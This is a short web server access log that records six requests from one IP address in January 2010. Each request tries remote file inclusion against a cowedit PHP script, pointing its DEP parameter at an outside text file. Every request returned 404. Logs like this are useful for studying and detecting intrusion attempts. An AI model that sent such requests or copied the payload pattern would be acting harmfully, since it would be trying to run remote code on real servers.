74.223.143.131 - - [10/Jan/2010:22:40:34 -0800] "GET /logs/access.log//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:35 -0800] "GET /logs/access.log%20%20//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:35 -0800] "GET /cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:40:35 -0800] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:25 -0800] "GET /cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:26 -0800] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
